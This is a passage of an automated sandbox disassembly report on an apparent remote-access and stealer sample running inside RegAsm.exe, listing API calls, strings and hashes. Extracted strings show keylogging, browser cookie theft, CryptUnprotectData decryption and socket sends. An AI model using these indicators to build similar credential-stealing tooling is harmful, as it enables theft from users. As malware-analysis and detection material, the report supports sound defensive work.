                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 00444118
                                                                                                                                        • _free.LIBCMT ref: 0044412B
                                                                                                                                        • _free.LIBCMT ref: 0044413C
                                                                                                                                        • _free.LIBCMT ref: 0044414D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                        • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                        • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 1000536F
                                                                                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                        • _free.LIBCMT ref: 10005381
                                                                                                                                        • _free.LIBCMT ref: 10005394
                                                                                                                                        • _free.LIBCMT ref: 100053A5
                                                                                                                                        • _free.LIBCMT ref: 100053B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                        • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                        • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                        • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                        APIs
                                                                                                                                        • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                        • _free.LIBCMT ref: 0044E8D5
                                                                                                                                          • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                          • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                          • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                        • String ID: *?$.
                                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                        • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                        • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00364948,00000010), ref: 004048E0
                                                                                                                                          • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                        • String ID: XQG$NG$PG
                                                                                                                                        • API String ID: 1634807452-3565412412
                                                                                                                                        • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                        • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                        • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                        • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                        • _free.LIBCMT ref: 004435E0
                                                                                                                                        • _free.LIBCMT ref: 004435EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                        • API String ID: 2506810119-1068371695
                                                                                                                                        • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                        • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                        • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                        • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                        • _free.LIBCMT ref: 10004CE8
                                                                                                                                        • _free.LIBCMT ref: 10004CF2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                        • API String ID: 2506810119-1068371695
                                                                                                                                        • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                        • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                        • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                        • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                        • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                        • API String ID: 368326130-3219657780
                                                                                                                                        • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                        • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                        • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                        • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00416330
                                                                                                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                          • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                          • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                          • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$CloseCreateValue
                                                                                                                                        • String ID: !D@$okmode$PG
                                                                                                                                        • API String ID: 3411444782-3370592832
                                                                                                                                        • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                        • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                        • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                        • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                                        Strings
                                                                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                        • API String ID: 1174141254-1980882731
                                                                                                                                        • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                        • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                        • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                        • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                                        Strings
                                                                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                        • API String ID: 1174141254-1980882731
                                                                                                                                        • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                        • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                        • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                        • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                        • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                        • API String ID: 1497725170-1359877963
                                                                                                                                        • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                        • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                        • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                        • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                        • String ID: Online Keylogger Started
                                                                                                                                        • API String ID: 112202259-1258561607
                                                                                                                                        • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                        • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                        • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                        • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: CryptUnprotectData$crypt32
                                                                                                                                        • API String ID: 2574300362-2380590389
                                                                                                                                        • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                        • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                        • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                        • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                        • String ID: Connection Timeout
                                                                                                                                        • API String ID: 2055531096-499159329
                                                                                                                                        • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                        • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                        • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                        • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                        APIs
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                                        • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                        • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                        • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                        • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                                                                                                        • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                        • String ID: pth_unenc
                                                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                                                        • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                        • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                        • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                        • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                        • String ID: bad locale name
                                                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                                                        • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                        • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                        • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                        • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
